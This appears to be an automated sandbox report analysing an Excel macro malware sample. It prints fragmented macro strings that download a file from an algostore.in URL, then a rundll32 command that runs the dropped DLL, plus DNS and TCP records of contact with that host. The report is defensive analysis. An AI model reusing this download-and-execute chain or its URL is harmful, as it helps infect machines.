                                                                                                                                                      ,,,,,,,,,,,,,,,,,,,,http://www.algostore.in/algostoreold/printme.php,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=HALT(),,,,,,,,,,,,,,,,,,,,,,,,,..\hdoanal.sbl,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,RL,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,U,,UR,,JJC,,,,,,,,,,,,,,,,,,,,,,,,,,LDow,CBB,,,,,,,,,,,,,,,,,,,,,,,,nload,,,,,,,,,,,,,,,,,,,,,,,,,,,,,ToFil,,,,,,,,,,,,,,,,,,,,,,,,,,,eA,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,r,,,",St",a,,,,,,,,,,,,,,,,,,,,,,,u,,,rt,,,,,,,,,,,,,,,,,,,,,,,,ndl,,,W,,,,,,,,,,,,,,,,,,,,,,,,l32 ,,,,,,,,,,,,,,,,,,,,,Mo,,,,,,,,,,,,,,,,,,,,,,,,,,,n,,,,,,,,,,,

                                                                                                                                                      Network Behavior

                                                                                                                                                      Network Port Distribution

                                                                                                                                                      TCP Packets

                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                      Apr 8, 2021 18:37:15.123862982 CEST4970680192.168.2.5103.212.121.53
                                                                                                                                                      Apr 8, 2021 18:37:18.195962906 CEST4970680192.168.2.5103.212.121.53
                                                                                                                                                      Apr 8, 2021 18:37:24.196430922 CEST4970680192.168.2.5103.212.121.53

                                                                                                                                                      UDP Packets

                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                      Apr 8, 2021 18:36:57.865547895 CEST6530753192.168.2.58.8.8.8
                                                                                                                                                      Apr 8, 2021 18:36:57.878009081 CEST53653078.8.8.8192.168.2.5
                                                                                                                                                      Apr 8, 2021 18:36:58.492275000 CEST6434453192.168.2.58.8.8.8
                                                                                                                                                      Apr 8, 2021 18:36:58.505367994 CEST53643448.8.8.8192.168.2.5
                                                                                                                                                      Apr 8, 2021 18:36:59.563884974 CEST6206053192.168.2.58.8.8.8
                                                                                                                                                      Apr 8, 2021 18:36:59.576536894 CEST53620608.8.8.8192.168.2.5
                                                                                                                                                      Apr 8, 2021 18:37:00.960122108 CEST6180553192.168.2.58.8.8.8
                                                                                                                                                      Apr 8, 2021 18:37:00.978140116 CEST53618058.8.8.8192.168.2.5
                                                                                                                                                      Apr 8, 2021 18:37:01.774230957 CEST5479553192.168.2.58.8.8.8
                                                                                                                                                      Apr 8, 2021 18:37:01.786935091 CEST53547958.8.8.8192.168.2.5
                                                                                                                                                      Apr 8, 2021 18:37:03.890060902 CEST4955753192.168.2.58.8.8.8
                                                                                                                                                      Apr 8, 2021 18:37:03.905318975 CEST53495578.8.8.8192.168.2.5
                                                                                                                                                      Apr 8, 2021 18:37:09.479341030 CEST6173353192.168.2.58.8.8.8
                                                                                                                                                      Apr 8, 2021 18:37:09.492615938 CEST53617338.8.8.8192.168.2.5
                                                                                                                                                      Apr 8, 2021 18:37:10.584806919 CEST6544753192.168.2.58.8.8.8
                                                                                                                                                      Apr 8, 2021 18:37:10.610882998 CEST53654478.8.8.8192.168.2.5
                                                                                                                                                      Apr 8, 2021 18:37:10.641222954 CEST5244153192.168.2.58.8.8.8
                                                                                                                                                      Apr 8, 2021 18:37:10.653772116 CEST53524418.8.8.8192.168.2.5
                                                                                                                                                      Apr 8, 2021 18:37:10.916894913 CEST6217653192.168.2.58.8.8.8
                                                                                                                                                      Apr 8, 2021 18:37:10.936340094 CEST53621768.8.8.8192.168.2.5
                                                                                                                                                      Apr 8, 2021 18:37:11.929955006 CEST6217653192.168.2.58.8.8.8
                                                                                                                                                      Apr 8, 2021 18:37:11.943269968 CEST53621768.8.8.8192.168.2.5
                                                                                                                                                      Apr 8, 2021 18:37:12.947560072 CEST6217653192.168.2.58.8.8.8
                                                                                                                                                      Apr 8, 2021 18:37:12.962551117 CEST53621768.8.8.8192.168.2.5
                                                                                                                                                      Apr 8, 2021 18:37:13.870948076 CEST5959653192.168.2.58.8.8.8
                                                                                                                                                      Apr 8, 2021 18:37:13.883527994 CEST53595968.8.8.8192.168.2.5
                                                                                                                                                      Apr 8, 2021 18:37:14.946736097 CEST6217653192.168.2.58.8.8.8
                                                                                                                                                      Apr 8, 2021 18:37:14.957494974 CEST6529653192.168.2.58.8.8.8
                                                                                                                                                      Apr 8, 2021 18:37:14.960091114 CEST53621768.8.8.8192.168.2.5
                                                                                                                                                      Apr 8, 2021 18:37:15.121537924 CEST53652968.8.8.8192.168.2.5
                                                                                                                                                      Apr 8, 2021 18:37:15.137412071 CEST6318353192.168.2.58.8.8.8
                                                                                                                                                      Apr 8, 2021 18:37:15.151024103 CEST53631838.8.8.8192.168.2.5
                                                                                                                                                      Apr 8, 2021 18:37:16.284104109 CEST6015153192.168.2.58.8.8.8
                                                                                                                                                      Apr 8, 2021 18:37:16.296953917 CEST53601518.8.8.8192.168.2.5
                                                                                                                                                      Apr 8, 2021 18:37:17.601897955 CEST5696953192.168.2.58.8.8.8
                                                                                                                                                      Apr 8, 2021 18:37:17.614370108 CEST53569698.8.8.8192.168.2.5
                                                                                                                                                      Apr 8, 2021 18:37:18.961779118 CEST6217653192.168.2.58.8.8.8
                                                                                                                                                      Apr 8, 2021 18:37:18.975126028 CEST53621768.8.8.8192.168.2.5
                                                                                                                                                      Apr 8, 2021 18:37:25.330976009 CEST5516153192.168.2.58.8.8.8
                                                                                                                                                      Apr 8, 2021 18:37:25.349070072 CEST53551618.8.8.8192.168.2.5
                                                                                                                                                      Apr 8, 2021 18:37:31.694561958 CEST5475753192.168.2.58.8.8.8
                                                                                                                                                      Apr 8, 2021 18:37:31.710724115 CEST53547578.8.8.8192.168.2.5
                                                                                                                                                      Apr 8, 2021 18:37:35.719192028 CEST4999253192.168.2.58.8.8.8
                                                                                                                                                      Apr 8, 2021 18:37:35.737232924 CEST53499928.8.8.8192.168.2.5
                                                                                                                                                      Apr 8, 2021 18:38:05.372750044 CEST6007553192.168.2.58.8.8.8
                                                                                                                                                      Apr 8, 2021 18:38:05.385710955 CEST53600758.8.8.8192.168.2.5
                                                                                                                                                      Apr 8, 2021 18:38:10.506078005 CEST5501653192.168.2.58.8.8.8
                                                                                                                                                      Apr 8, 2021 18:38:10.525973082 CEST53550168.8.8.8192.168.2.5
                                                                                                                                                      Apr 8, 2021 18:38:26.166548967 CEST6434553192.168.2.58.8.8.8
                                                                                                                                                      Apr 8, 2021 18:38:26.192601919 CEST53643458.8.8.8192.168.2.5
                                                                                                                                                      Apr 8, 2021 18:38:41.321271896 CEST5712853192.168.2.58.8.8.8
                                                                                                                                                      Apr 8, 2021 18:38:41.333669901 CEST53571288.8.8.8192.168.2.5
                                                                                                                                                      Apr 8, 2021 18:38:42.901650906 CEST5479153192.168.2.58.8.8.8
                                                                                                                                                      Apr 8, 2021 18:38:42.935709000 CEST53547918.8.8.8192.168.2.5
                                                                                                                                                      Apr 8, 2021 18:39:14.179337978 CEST5046353192.168.2.58.8.8.8
                                                                                                                                                      Apr 8, 2021 18:39:14.197463036 CEST53504638.8.8.8192.168.2.5
                                                                                                                                                      Apr 8, 2021 18:39:40.001725912 CEST5039453192.168.2.58.8.8.8
                                                                                                                                                      Apr 8, 2021 18:39:40.076653957 CEST53503948.8.8.8192.168.2.5

                                                                                                                                                      DNS Queries

                                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                      Apr 8, 2021 18:37:14.957494974 CEST192.168.2.58.8.8.80x2f78Standard query (0)www.algostore.inA (IP address)IN (0x0001)

                                                                                                                                                      DNS Answers

                                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                      Apr 8, 2021 18:37:15.121537924 CEST8.8.8.8192.168.2.50x2f78No error (0)www.algostore.inalgostore.inCNAME (Canonical name)IN (0x0001)
                                                                                                                                                      Apr 8, 2021 18:37:15.121537924 CEST8.8.8.8192.168.2.50x2f78No error (0)algostore.in103.212.121.53A (IP address)IN (0x0001)

                                                                                                                                                      Code Manipulations

                                                                                                                                                      Statistics

                                                                                                                                                      CPU Usage

                                                                                                                                                      Click to jump to process

                                                                                                                                                      Memory Usage

                                                                                                                                                      Click to jump to process

                                                                                                                                                      High Level Behavior Distribution

                                                                                                                                                      Click to dive into process behavior distribution

                                                                                                                                                      Behavior

                                                                                                                                                      Click to jump to process

                                                                                                                                                      System Behavior

                                                                                                                                                      General

                                                                                                                                                      Start time:18:37:09
                                                                                                                                                      Start date:08/04/2021
                                                                                                                                                      Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
                                                                                                                                                      Imagebase:0x240000
                                                                                                                                                      File size:27110184 bytes
                                                                                                                                                      MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high

                                                                                                                                                      General

                                                                                                                                                      Start time:18:37:36
                                                                                                                                                      Start date:08/04/2021
                                                                                                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:rundll32 ..\hdoanal.sbl,StartW
                                                                                                                                                      Imagebase:0xdc0000
                                                                                                                                                      File size:61952 bytes
                                                                                                                                                      MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high

                                                                                                                                                      Disassembly

                                                                                                                                                      Code Analysis

                                                                                                                                                      Reset < >